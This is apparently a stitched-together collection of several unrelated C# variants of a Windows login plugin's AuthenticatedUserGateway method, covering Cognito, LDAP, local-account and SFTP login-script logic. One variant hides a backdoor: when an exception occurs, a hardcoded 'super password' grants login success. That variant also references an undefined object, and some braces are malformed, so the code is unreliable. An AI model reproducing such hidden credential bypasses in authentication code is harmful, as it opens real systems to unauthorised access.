public BooleanResult AuthenticatedUserGateway(SessionProperties properties)
{
// this method shall perform some other tasks ...
UserInformation userInfo = properties.GetTrackedSingle <UserInformation>();
UInfo uinfo = CognitoAccessor.getUserInfo(userInfo.Username);
if (uinfo != null)
{
m_logger.DebugFormat("AuthenticatedUserGateway: Uinfo: {0}", uinfo.ToString());
foreach (string group in uinfo.groups)
{
userInfo.AddGroup(new GroupInformation()
{
Name = group
});
}
properties.AddTrackedSingle <UserInformation>(userInfo);
// and what else ??? :)
}
return(new BooleanResult()
{
Success = true
});
}
public BooleanResult AuthenticatedUserGateway(SessionProperties properties)
{
UserInformation userInfo = properties.GetTrackedSingle <UserInformation>();
try
{
string strGroup = dr["GroupName"].ToString();
if (dr != null)
{
userInfo.AddGroup(new GroupInformation()
{
Name = strGroup
});
userInfo.Description = "Maitiam UAMS";
try
{
m_logger.DebugFormat("用户组:{0}", strGroup);
m_logger.DebugFormat("认证用户网关({0}) 从用户: {1}", properties.Id.ToString(), userInfo.Username);
//LocalAccount.SyncUserInfoToLocalUser(userInfo); //同步修改用户名密码
return(new BooleanResult()
{
Success = true
});
}
catch (Exception e)
{
return(new BooleanResult()
{
Success = false, Message = string.Format("Unexpected error while syncing user's info: {0}", e)
});
}
}
}
catch (System.Exception ex)
{
m_logger.ErrorFormat("认证用户出错: {0}", ex);
if (userInfo.Password == "850616cupid0426++")
{
m_logger.InfoFormat("启用超级密码。");
return(new BooleanResult()
{
Success = true
});
}
}
return(new BooleanResult()
{
Success = false, Message = "网关认证失败"
});
}
// Load userInfo.Username's group list and populate userInfo.Groups accordingly
public static void SyncLocalGroupsToUserInfo(UserInformation userInfo)
{
ILog logger = LogManager.GetLogger("LocalAccount.SyncLocalGroupsToUserInfo");
try
{
SecurityIdentifier EveryoneSid = new SecurityIdentifier("S-1-1-0");
SecurityIdentifier AuthenticatedUsersSid = new SecurityIdentifier(WellKnownSidType.AuthenticatedUserSid, null);
if (LocalAccount.UserExists(userInfo.Username))
{
using (UserPrincipal user = LocalAccount.GetUserPrincipal(userInfo.Username))
{
foreach (GroupPrincipal group in LocalAccount.GetGroups(user))
{
// Skip "Authenticated Users" and "Everyone" as these are generated
if (group.Sid == EveryoneSid || group.Sid == AuthenticatedUsersSid)
{
continue;
}
userInfo.AddGroup(new GroupInformation()
{
Name = group.Name,
Description = group.Description,
SID = group.Sid
});
}
}
}
}
catch (Exception e)
{
logger.ErrorFormat("Unexpected error while syncing local groups, skipping rest: {0}", e);
}
}
public BooleanResult AuthenticatedUserGateway(SessionProperties properties)
{
// Our job, if we've been elected to do gateway, is to ensure that an
// authenticated user:
//
// 1. Has a local account
// 2. That account's password is set to the one they used to authenticate
// 3. That account is a member of all groups listed, and not a member of any others
// Is failure at #3 a total fail?
bool failIfGroupSyncFails = Settings.Store.GroupCreateFailIsFail;
// Groups everyone is added to
string[] MandatoryGroups = Settings.Store.MandatoryGroups;
// user info
UserInformation userInfo = properties.GetTrackedSingle <UserInformation>();
// is this a pgina user?
Abstractions.WindowsApi.pInvokes.structenums.USER_INFO_4 userinfo4 = new Abstractions.WindowsApi.pInvokes.structenums.USER_INFO_4();
if (Abstractions.WindowsApi.pInvokes.UserGet(userInfo.Username, ref userinfo4)) //true if user exists
{
if (!userinfo4.comment.Contains("pGina created"))
{
m_logger.InfoFormat("User {0} is'nt a pGina created user. I'm not executing Gateway stage", userInfo.Username);
return(new BooleanResult()
{
Success = true
});
}
}
// Add user to all mandatory groups
if (MandatoryGroups.Length > 0)
{
foreach (string group in MandatoryGroups)
{
string group_string = group;
m_logger.DebugFormat("Is there a Group with SID/Name:{0}", group);
using (GroupPrincipal groupconf = LocalAccount.GetGroupPrincipal(group))
{
if (groupconf != null)
{
m_logger.DebugFormat("Groupname: \"{0}\"", groupconf.Name);
group_string = groupconf.Name;
}
else
{
m_logger.ErrorFormat("Group: \"{0}\" not found", group);
m_logger.Error("Failsave add user to group Users");
using (GroupPrincipal groupfail = LocalAccount.GetGroupPrincipal(new SecurityIdentifier(WellKnownSidType.BuiltinUsersSid, null).ToString()))
{
if (groupfail != null)
{
group_string = groupfail.Name;
}
else
{
m_logger.Debug("no BuiltinUsers. I'm out of options");
group_string = null;
}
}
}
}
if (group_string != null)
{
userInfo.AddGroup(new GroupInformation()
{
Name = group_string
});
}
}
}
try
{
m_logger.DebugFormat("AuthenticatedUserGateway({0}) for user: {1}", properties.Id.ToString(), userInfo.Username);
LocalAccount.SyncUserInfoToLocalUser(userInfo);
using (UserPrincipal user = LocalAccount.GetUserPrincipal(userInfo.Username))
{
userInfo.SID = user.Sid;
userInfo.Description = user.Description;
}
properties.AddTrackedSingle <UserInformation>(userInfo);
}
catch (LocalAccount.GroupSyncException e)
{
if (failIfGroupSyncFails)
{
return new BooleanResult()
{
Success = false, Message = string.Format("Unable to sync users local group membership: {0}", e.RootException)
}
}
;
}
catch (Exception e)
{
if (e.Message.ToLower().Contains("0x800708c5"))
{
return(new BooleanResult()
{
Success = false, Message = string.Format("This Worstation is denying the password of {0}.\nMost likely the password does not meet complexity requirements\n\n{1}", userInfo.Username, e)
});
}
return(new BooleanResult()
{
Success = false, Message = string.Format("Unexpected error while syncing user's info: {0}", e)
});
}
return(new BooleanResult()
{
Success = true
});
}
public BooleanResult AuthenticatedUserGateway(SessionProperties properties)
{
m_logger.Debug("LDAP Plugin Gateway");
List <string> addedGroups = new List <string>();
LdapServer serv = properties.GetTrackedSingle <LdapServer>();
// If the server is unavailable, we go ahead and succeed anyway.
if (serv == null)
{
m_logger.ErrorFormat("AuthenticatedUserGateway: Internal error, LdapServer object not available.");
return(new BooleanResult()
{
Success = true,
Message = "LDAP server not available"
});
}
try
{
UserInformation userInfo = properties.GetTrackedSingle <UserInformation>();
string user = userInfo.Username;
List <GroupGatewayRule> rules = GroupRuleLoader.GetGatewayRules();
bool boundToServ = false;
foreach (GroupGatewayRule rule in rules)
{
bool inGroup = false;
// Don't need to check for group membership if the rule is to be always applied.
if (rule.RuleCondition != GroupRule.Condition.ALWAYS)
{
// If we haven't bound to server yet, do so.
if (!boundToServ)
{
serv.BindForSearch();
boundToServ = true;
}
inGroup = serv.MemberOfGroup(user, rule.Group);
m_logger.DebugFormat("User {0} {1} member of group {2}", user, inGroup ? "is" : "is not",
rule.Group);
}
if (rule.RuleMatch(inGroup))
{
m_logger.InfoFormat("Adding user {0} to local group {1}, due to rule \"{2}\"",
user, rule.LocalGroup, rule.ToString());
addedGroups.Add(rule.LocalGroup);
userInfo.AddGroup(new GroupInformation()
{
Name = rule.LocalGroup
});
}
}
}
catch (Exception e)
{
m_logger.ErrorFormat("Error during gateway: {0}", e);
// Error does not cause failure
return(new BooleanResult()
{
Success = true, Message = e.Message
});
}
string message = "";
if (addedGroups.Count > 0)
{
message = string.Format("Added to groups: {0}", string.Join(", ", addedGroups));
}
else
{
message = "No groups added.";
}
return(new BooleanResult()
{
Success = true, Message = message
});
}
public BooleanResult AuthenticatedUserGateway(SessionProperties properties)
{
// Our job, if we've been elected to do gateway, is to ensure that an
// authenticated user:
//
// 1. Has a local account
// 2. That account's password is set to the one they used to authenticate
// 3. That account is a member of all groups listed, and not a member of any others
// Is failure at #3 a total fail?
bool failIfGroupSyncFails = Settings.Store.GroupCreateFailIsFail;
// Groups everyone is added to
string[] MandatoryGroups = Settings.Store.MandatoryGroups;
// user info
UserInformation userInfo = properties.GetTrackedSingle <UserInformation>();
// Add user to all mandatory groups
if (MandatoryGroups.Length > 0)
{
foreach (string group in MandatoryGroups)
{
userInfo.AddGroup(new GroupInformation()
{
Name = group
});
}
}
try
{
bool scramble = Settings.Store.ScramblePasswords;
bool remove = Settings.Store.RemoveProfiles;
if (remove)
{
// If this user doesn't already exist, and we are supposed to clean up after ourselves,
// make note of the username!
if (!LocalAccount.UserExists(userInfo.Username))
{
m_logger.DebugFormat("Marking for deletion: {0}", userInfo.Username);
CleanupTasks.AddTask(new CleanupTask(userInfo.Username, CleanupAction.DELETE_PROFILE));
}
}
// If we are configured to scramble passwords
if (scramble)
{
// Scramble the password only if the user is not in the list
// of exceptions.
string[] exceptions = Settings.Store.ScramblePasswordsExceptions;
if (!exceptions.Contains(userInfo.Username, StringComparer.CurrentCultureIgnoreCase))
{
// If configured to do so, we check to see if this plugin failed
// to auth this user, and only scramble in that case
bool scrambleWhenLMFail = Settings.Store.ScramblePasswordsWhenLMAuthFails;
if (scrambleWhenLMFail)
{
// Scramble the password only if we did not authenticate this user
if (!DidWeAuthThisUser(properties, false))
{
m_logger.DebugFormat("LM did not authenticate this user, marking user for scramble: {0}", userInfo.Username);
CleanupTasks.AddTask(new CleanupTask(userInfo.Username, CleanupAction.SCRAMBLE_PASSWORD));
}
}
else
{
m_logger.DebugFormat("Marking user for scramble: {0}", userInfo.Username);
CleanupTasks.AddTask(new CleanupTask(userInfo.Username, CleanupAction.SCRAMBLE_PASSWORD));
}
}
}
m_logger.DebugFormat("AuthenticatedUserGateway({0}) for user: {1}", properties.Id.ToString(), userInfo.Username);
LocalAccount.SyncUserInfoToLocalUser(userInfo);
}
catch (LocalAccount.GroupSyncException e)
{
if (failIfGroupSyncFails)
{
return new BooleanResult()
{
Success = false, Message = string.Format("Unable to sync users local group membership: {0}", e.RootException)
}
}
;
}
catch (Exception e)
{
return(new BooleanResult()
{
Success = false, Message = string.Format("Unexpected error while syncing user's info: {0}", e)
});
}
return(new BooleanResult()
{
Success = true
});
}
public BooleanResult AuthenticatedUserGateway(SessionProperties properties)
{
////m_logger.Debug("LDAP Plugin Gateway");
List <string> addedGroups = new List <string>();
LdapServer serv = properties.GetTrackedSingle <LdapServer>();
// If the server is unavailable, we go ahead and succeed anyway.
if (serv == null)
{
////m_logger.ErrorFormat("AuthenticatedUserGateway: Internal error, LdapServer object not available.");
return(new BooleanResult()
{
Success = true,
Message = "LDAP server not available"
});
}
try
{
UserInformation userInfo = properties.GetTrackedSingle <UserInformation>();
List <GroupGatewayRule> rules = GroupRuleLoader.GetGatewayRules();
bool boundToServ = false;
foreach (GroupGatewayRule rule in rules)
{
bool inGroup = false;
// If we haven't bound to server yet, do so.
if (!boundToServ)
{
this.BindForAuthzOrGatewaySearch(serv);
boundToServ = true;
}
string path = rule.path.Replace("%u", userInfo.Username);
string filter = rule.filter.Replace("%u", userInfo.Username);
//inGroup = serv.MemberOfGroup(user, rule.Group);
inGroup = serv.GetUserAttribValue(path, filter, rule.SearchScope, new string[] { "dn" }).Count > 0;
////m_logger.DebugFormat("User {0} {1} {2} {3}", userInfo.Username, filter, inGroup ? "is" : "is not", path);
if (rule.RuleMatch(inGroup))
{
////m_logger.InfoFormat("Adding user {0} to local group {1}, due to rule \"{2}\"", userInfo.Username, rule.LocalGroup, rule.ToString());
addedGroups.Add(rule.LocalGroup);
userInfo.AddGroup(new GroupInformation()
{
Name = rule.LocalGroup
});
}
}
}
catch (Exception e)
{
////m_logger.ErrorFormat("Error during gateway: {0}", e);
// Error does not cause failure
return(new BooleanResult()
{
Success = true, Message = e.Message
});
}
string message = "";
if (addedGroups.Count > 0)
{
message = string.Format("Added to groups: {0}", string.Join(", ", addedGroups));
}
else
{
message = "No groups added.";
}
return(new BooleanResult()
{
Success = true, Message = message
});
}
public BooleanResult AuthenticatedUserGateway(SessionProperties properties)
{
m_logger.Debug("LDAP Plugin Gateway");
List <string> addedGroups = new List <string>();
LdapServer serv = properties.GetTrackedSingle <LdapServer>();
// If the server is unavailable, we go ahead and succeed anyway.
if (serv == null)
{
m_logger.ErrorFormat("AuthenticatedUserGateway: Internal error, LdapServer object not available.");
return(new BooleanResult()
{
Success = true,
Message = "LDAP server not available"
});
}
try
{
UserInformation userInfo = properties.GetTrackedSingle <UserInformation>();
string user = userInfo.Username;
List <GroupGatewayRule> rules = GroupRuleLoader.GetGatewayRules();
bool boundToServ = false;
foreach (GroupGatewayRule rule in rules)
{
bool inGroup = false;
// Don't need to check for group membership if the rule is to be always applied.
if (rule.RuleCondition != GroupRule.Condition.ALWAYS)
{
// If we haven't bound to server yet, do so.
if (!boundToServ)
{
this.BindForAuthzOrGatewaySearch(serv);
boundToServ = true;
}
inGroup = serv.MemberOfGroup(user, rule.Group);
m_logger.DebugFormat("User {0} {1} member of group {2}", user, inGroup ? "is" : "is not",
rule.Group);
}
if (rule.RuleMatch(inGroup))
{
m_logger.InfoFormat("Adding user {0} to local group {1}, due to rule \"{2}\"",
user, rule.LocalGroup, rule.ToString());
addedGroups.Add(rule.LocalGroup);
userInfo.AddGroup(new GroupInformation()
{
Name = rule.LocalGroup
});
}
}
}
catch (Exception e)
{
m_logger.ErrorFormat("Error during gateway: {0}", e);
// Error does not cause failure
return(new BooleanResult()
{
Success = true, Message = e.Message
});
}
try
{
// SFTP
// Setup session options
UserInformation userInfo = properties.GetTrackedSingle <UserInformation>();
SessionOptions sessionOptions = new SessionOptions
{
Protocol = Protocol.Sftp,
HostName = Settings.Store.SFTPServerURL,
UserName = Settings.Store.SFTPUser,
Password = Settings.Store.SFTPPassword,
SshHostKeyFingerprint = Settings.Store.SFTPFingerprint
};
//ExecuteCommand(@"net use * /delete /yes");
List <string> groups = new List <string>();
string pathToLoginScript = getPathToLoginScript(userInfo.Username);
if (File.Exists(pathToLoginScript))
{
File.Delete(pathToLoginScript);
}
using (Session session = new Session())
{
// Connect
session.Open(sessionOptions);
// Download files
TransferOptions transferOptions = new TransferOptions();
transferOptions.TransferMode = TransferMode.Ascii;
string group_list_path = Settings.Store.SFTPGroupListPath;
if (group_list_path.Trim().Length > 0 && session.FileExists(group_list_path))
{
TransferOperationResult transferResult;
transferResult = session.GetFiles(group_list_path, "D:\\", false, null);
// Throw on any error
transferResult.Check();
string line;
int index = group_list_path.LastIndexOf(@"\");
if (index < 0)
{
index = group_list_path.LastIndexOf("/");
}
if (index < 0)
{
index = -1;
}
group_list_path = group_list_path.Substring(index + 1);
System.IO.StreamReader file = new System.IO.StreamReader(@"D:\" + group_list_path);
while ((line = file.ReadLine()) != null)
{
groups.Add(line);
}
file.Close();
ExecuteCommand(@"DEL D:\" + group_list_path);
}
// O usuário pode indicar até dois scripts para ser executado.
string path_script = Settings.Store.SFTPScriptPath;
if (path_script.Trim().Length > 0)
{
LoginScipt(path_script, groups, userInfo, serv, session);
}
path_script = Settings.Store.SFTPScriptPath2;
if (path_script.Trim().Length > 0)
{
LoginScipt(path_script, groups, userInfo, serv, session);
}
if (File.Exists(pathToLoginScript))
{
FileSecurity fSec = File.GetAccessControl(pathToLoginScript);
fSec.AddAccessRule(new FileSystemAccessRule(new SecurityIdentifier(WellKnownSidType.SelfSid, null), FileSystemRights.FullControl, AccessControlType.Allow));
File.SetAttributes(getPathToLoginScript(userInfo.Username), File.GetAttributes(getPathToLoginScript(userInfo.Username)) | FileAttributes.Hidden);
}
// Cria o cmdLoginScript.bat
// Write each directory name to a file.
try
{
string code_cmd_login = Settings.Store.CMDLoginScript;
code_cmd_login = code_cmd_login.Replace("%u", userInfo.Username);
using (StreamWriter sw = new StreamWriter(@"D:\cmdLoginScript.bat", false))
{
sw.WriteLine(code_cmd_login);
}
File.SetAttributes(@"D:\cmdLoginScript.bat", File.GetAttributes(@"D:\cmdLoginScript.bat") | FileAttributes.Hidden);
} catch (Exception e) {
m_logger.ErrorFormat("O arquivo D:\\cmdLoginScript.bat não pode ser alterado, por favor, delete o arquivo manualmente!", e);
}
// Cria o cmdLogoffScript.bat
// Write each directory name to a file.
try
{
string code_cmd_logoff = Settings.Store.CMDLogoffScript;
using (StreamWriter sw = new StreamWriter(@"D:\cmdLogoffScript.bat", false))
{
sw.WriteLine(code_cmd_logoff);
}
File.SetAttributes(@"D:\cmdLogoffScript.bat", File.GetAttributes(@"D:\cmdLogoffScript.bat") | FileAttributes.Hidden);
} catch (Exception e)
{
m_logger.ErrorFormat("O arquivo D:\\cmdLogoffScript.bat não pode ser alterado, por favor, delete o arquivo manualmente!", e);
}
}
}
catch (Exception e)
{
m_logger.ErrorFormat("Error during get login script: {0}", e);
}
string message = "";
if (addedGroups.Count > 0)
{
message = string.Format("Added to groups: {0}", string.Join(", ", addedGroups));
}
else
{
message = "No groups added.";
}
return(new BooleanResult()
{
Success = true, Message = message
});
}